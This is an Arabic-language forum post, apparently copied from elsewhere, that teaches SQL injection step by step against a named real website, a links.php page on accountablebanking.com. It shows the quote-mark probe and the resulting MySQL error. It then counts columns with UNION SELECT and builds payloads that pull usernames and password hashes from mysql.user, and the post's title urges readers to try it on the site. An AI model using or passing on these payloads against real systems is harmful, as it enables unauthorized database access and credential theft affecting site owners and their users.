السلام عليكم ياحلوين وش اخباركم هذا درس سهل وتطبيق يعني لاطبقت راح تفهم وش sql
.
اول شي هذي الثغره
كود:
http://www.accountablebanking.com/links.php?link_id=-11
طبعا نضيف العلامه عشان يطلع الخط بعد الرقم 11ا
عشان نشوف يطلع خطا؟ طلع لنا خطا كذا
كود:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
يعني في ثغره ياحلو .. الان .. نضيف
كود:
http://www.accountablebanking.com/links.php?link_id=-11+union+select+1,2/*
ويطلع لك كذا
كود:
The used SELECT statements have a different number of columns
يعني اضف رقم .. واضغط انتر.. تزايديا حتى يختفي الخطا الان اختفى الخطآ الى الرقم
كود:
http://www.accountablebanking.com/links.php?link_id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11/*
طلع لي رقمين 5 و 6 يعني االحين راح نظيف اخر شي
كود:
http://www.accountablebanking.com/links.php?link_id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11+from+mysql.user/*
شفتو اخر كلمه mysql.user ملاحظه بعض المواقع ماتشتغل عليه غير كلمه mysql.user الى mysql.dbh او information_schema.tables للجدول او admin او user او users الخ ..
بعد ماضفنا طلع لنا 5 + 6 طيب نبدل رقم خمس user ورقم سته password ملاحظه هذاااذا مااشتعل الموقع
كود:
http://www.accountablebanking.com/links.php?link_id=-11+union+select+1,2,3,4,user,password,7,8,9,10,11+from+mysql.user/*
وكذا طلعنا الباسوورد .. ملاحظه انا الحين لاكتبت user برقم خمسه او سته .. يطلع لي يوزر غيـر .. وصراحه ماقدرت اطلع الجداول... ياليت احد يكمل لاني ماني خبره صح نص ونص .
كود:
http://www.accountablebanking.com/links.php?link_id=-11+union+select+1,2,3,4,user,6,7,8,9,10,11+from+mysql.user/*
واتمنى الشرح نال اعجابكم واي خطآ قولو . ترى الانسان دايما معرض للآخطآ .. وتحيآتي
منقول
مواضيع تفيدك :
طريقة
رؤية الروابط في المواضيع |
طريقة
طرح برنامج او موضوع في المنتدى
هذه الرسالة تفيد بأنك غير مقيم معنا. للاشتراك الرجاء اضغط
هنــا
ثغرات sql + درس سهل + تطبيق على موقع تعالو طبقو
العرض العادي
